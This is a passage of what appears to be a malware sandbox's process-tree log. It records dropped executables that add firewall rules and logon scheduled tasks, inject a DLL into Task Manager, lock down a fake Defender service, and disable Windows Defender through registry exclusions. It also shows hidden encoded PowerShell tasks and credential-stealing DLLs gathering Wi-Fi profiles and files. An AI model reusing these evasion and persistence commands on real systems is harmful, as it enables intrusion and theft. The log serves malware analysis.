    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2528
    - - C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe
        
        "C:\Users\Admin\Pictures\KR7axLmK85pHCtYC8Jy6HuM8.exe"
        5⤵
        
        PID:5400
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:6112
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:6136
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:816
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5840
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4764
  - - C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe
      "C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe"
      4⤵
      Executes dropped EXE
      PID:4440
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4648
    - - C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe
        
        "C:\Users\Admin\Pictures\FHZBtr50rRcfTdllNwk2pZND.exe"
        5⤵
        
        PID:5496
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5292
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:5288
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:4364
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5884
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3552
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4440 -s 832
        5⤵
        Program crash
        
        PID:708
  - - C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe
      "C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe"
      4⤵
      Executes dropped EXE
      PID:2492
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3472
    - - C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe
        
        "C:\Users\Admin\Pictures\GMzYdBCcCSK6EIzmSzSqgTWZ.exe"
        5⤵
        
        PID:5672
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4484
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:1608
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:5900
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5680
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:1980
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        
        PID:3896
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5468
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:2892
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:1696
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:2792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:5388
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        
        PID:2632
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:5696
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        
        PID:2548
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        
        PID:3188
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        Launches sc.exe
        
        PID:5652
  - - C:\Users\Admin\Pictures\nZXf9m6T3j0fmQmAo2ECjkpw.exe
      "C:\Users\Admin\Pictures\nZXf9m6T3j0fmQmAo2ECjkpw.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:3816
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        5⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4240
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 620
        6⤵
        Program crash
        
        PID:2372
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 644
        6⤵
        Program crash
        
        PID:2372
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3816 -s 868
        5⤵
        Program crash
        
        PID:2020
  - - C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe
      "C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe" --silent --allusers=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      PID:3800
    - - C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe
        
        C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6f27e1d0,0x6f27e1dc,0x6f27e1e8
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3076
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\G0jT3CGihLOYKL4sbc74s4ak.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\G0jT3CGihLOYKL4sbc74s4ak.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3780
    - - C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe
        
        "C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3800 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240401133030" --session-guid=32799665-0bde-4673-b118-8a8ed9eaaf03 --server-tracking-blob=OWM3NmYzNWU3YmZlNzc0NGE2MGQwYjQwOGI4YmJkZmQ4MGIyNGZiNmViY2Q0ZTFjYmI3MWExOWM3NTljOWM3OTp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2N180NTYiLCJzeXN0ZW0iOnsicGxhdGZvcm0iOnsiYXJjaCI6Ing4Nl82NCIsIm9wc3lzIjoiV2luZG93cyIsIm9wc3lzLXZlcnNpb24iOiIxMCIsInBhY2thZ2UiOiJFWEUifX0sInRpbWVzdGFtcCI6IjE3MTE5NzgyMDkuNDM5OSIsInV0bSI6eyJjYW1wYWlnbiI6Ijc2N180NTYiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJta3QifSwidXVpZCI6ImYzMjgzMmU4LWI5NWQtNDkyZC1iNzAwLTgwMjc4MDUzODY0NiJ9 --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=1804000000000000
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        
        PID:2424
      - C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe
        
        C:\Users\Admin\Pictures\G0jT3CGihLOYKL4sbc74s4ak.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.35 --initial-client-data=0x2a8,0x2ac,0x2b0,0x278,0x2b4,0x6e8be1d0,0x6e8be1dc,0x6e8be1e8
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5016
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe"
        5⤵
        
        PID:940
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe" --version
        5⤵
        
        PID:5572
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404011330301\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.20 --initial-client-data=0x268,0x26c,0x270,0x244,0x274,0xd10040,0xd1004c,0xd10058
        6⤵
        
        PID:5968
  - - C:\Users\Admin\Pictures\LxSSn55Rw88rJ6lmDBQ8L4ps.exe
      "C:\Users\Admin\Pictures\LxSSn55Rw88rJ6lmDBQ8L4ps.exe"
      4⤵
      Executes dropped EXE
      PID:4748
    - - C:\Users\Admin\AppData\Local\Temp\7zS27B7.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        
        PID:4348
      - C:\Users\Admin\AppData\Local\Temp\7zS533C.tmp\Install.exe
        
        .\Install.exe /ydfmdidw "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:4380
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:5564
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:924
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:5968
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:5576
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:5828
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:6008
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gyIzNkbkI" /SC once /ST 09:32:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:6124
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gyIzNkbkI"
        7⤵
        
        PID:5740
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gyIzNkbkI"
        7⤵
        
        PID:772
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exe\" id /QHsite_idTsk 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:4440
  - - C:\Users\Admin\Pictures\q6fTDfvQIk0vQg4JK85pUzGa.exe
      "C:\Users\Admin\Pictures\q6fTDfvQIk0vQg4JK85pUzGa.exe"
      4⤵
      Modifies firewall policy service
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Drops file in System32 directory
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:2344
  - - C:\Users\Admin\Pictures\Bp69MLnON446Ce82F0kC5faD.exe
      "C:\Users\Admin\Pictures\Bp69MLnON446Ce82F0kC5faD.exe"
      4⤵
      Executes dropped EXE
      PID:2584
    - - C:\Users\Admin\AppData\Local\Temp\7zS26AD.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        
        PID:3180
      - C:\Users\Admin\AppData\Local\Temp\7zS53F7.tmp\Install.exe
        
        .\Install.exe /ydfmdidw "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:4404
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        
        PID:5852
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        8⤵
        
        PID:5140
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        9⤵
        
        PID:5604
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        9⤵
        
        PID:1612
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        
        PID:5896
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:5416
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
        9⤵
        
        PID:5792
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
        9⤵
        
        PID:4332
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gnCBwhIZZ" /SC once /ST 10:00:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:6060
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gnCBwhIZZ"
        7⤵
        
        PID:5744
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gnCBwhIZZ"
        7⤵
        
        PID:1568
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bdnnguwcOLBYKAjbbA" /SC once /ST 13:32:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\gLKZBXU.exe\" id /Qwsite_idRvr 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:3980
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4776
- - C:\Windows\system32\rundll32.exe
    "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
    3⤵
    - Blocklisted process makes network request
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:1376
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      PID:1028
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\045580317372_Desktop.zip' -CompressionLevel Optimal
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4868
- C:\Windows\SysWOW64\rundll32.exe
  "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
  2⤵
  - Blocklisted process makes network request
  - Loads dropped DLL
  PID:392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3816 -ip 3816
1⤵
PID:4504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4240 -ip 4240
1⤵
PID:1468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3580 -ip 3580
1⤵
PID:312

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4240 -ip 4240
1⤵
PID:4804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:2564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3332

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 976 -ip 976
1⤵
PID:5504

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3944
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5844

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:620
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:5440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4440 -ip 4440
1⤵
PID:1632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:3084

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:5992

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2816

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:5552

C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exe
C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\naOnfwtmHGUDmSz\aelnwhS.exe id /QHsite_idTsk 385118 /S
1⤵
PID:3172
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD 